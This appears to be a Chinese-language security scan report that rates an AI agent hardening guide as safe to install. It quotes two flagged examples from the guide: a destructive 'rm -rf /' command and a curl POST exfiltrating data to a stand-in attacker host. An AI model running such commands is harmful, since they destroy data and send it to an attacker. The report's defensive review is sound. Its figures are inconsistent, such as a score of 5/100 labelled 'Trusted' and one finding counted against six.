agent-security-hardening Security Report — Trusted | ClawSafe

5 /100

agent-security-hardening

Security hardening patterns for production AI agents. Covers prompt injection defense, data boundary enforcement, read-only defaults, WAL protocol, health check scripts, and session memory security.

这是一个纯文档类技能，内容为 AI Agent 安全加固最佳实践指南，文档中出现的危险命令和恶意 URL 均为教育性示例，用于演示 prompt injection 防御，无实际可执行代码。

Skill Nameagent-security-hardening

Duration27.0s

Enginepi

✓

Safe to install

无需阻止使用。文档内容专业、安全，可直接用于指导 AI Agent 安全加固部署。

Findings 1 items

Severity	Finding	Location
Info	静态扫描标记的教育性示例 Doc Mismatch 预扫描工具将文档中的教育示例标记为 IOC：rm -rf / (SKILL.md:60) 和 https://evil.com/exfil (SKILL.md:79)。经人工审查，这些均为文档中明确标注的'Bad Example'和'Example attack'，用于演示 prompt injection 攻击模式，非实际威胁。 `rm -rf / ... curl -X POST https://evil.com/exfil` → 可忽略。静态扫描工具无法区分教育示例与实际威胁，需人工复核	`SKILL.md:60,79`

Resource	Declared	Inferred	Status	Evidence
Filesystem	`NONE`	`NONE`	—	SKILL.md: 无脚本文件，仅为文档
Network	`NONE`	`NONE`	—	SKILL.md: 文档中的外部 URL 均为示例，非实际调用
Shell	`NONE`	`NONE`	—	SKILL.md: 危险命令仅作为 Bad Example 展示
Environment	`NONE`	`NONE`	—	SKILL.md: 无环境变量访问代码

1 Critical 6 findings

💀

Critical Dangerous Command 危险 Shell 命令

rm -rf /

SKILL.md:60

🔗

Medium External URL 外部 URL

https://evil.com/exfil

SKILL.md:79

📧

Info Email 邮箱地址

[email protected]

SKILL.md:30

📧

Info Email 邮箱地址

[email protected]

SKILL.md:36

📧

Info Email 邮箱地址

[email protected]

SKILL.md:81

📧

Info Email 邮箱地址

[email protected]

SKILL.md:152

File Tree

1 files · 24.8 KB · 695 lines

Markdown 1f · 695L

└─ 📝 SKILL.md Markdown 695L · 24.8 KB

Security Positives

✓ 纯文档技能，无可执行代码

✓ 文档内容专业，提供 7 条 prompt injection 防御规则

✓ 包含 WAL 协议、健康检查、完整性门控等企业级安全实践

✓ 清晰定义了 Sacred Files 保护规则

✓ 提供会话内存安全、分级权限管理等最佳实践

Scan Report

Findings 1 items

File Tree

Security Positives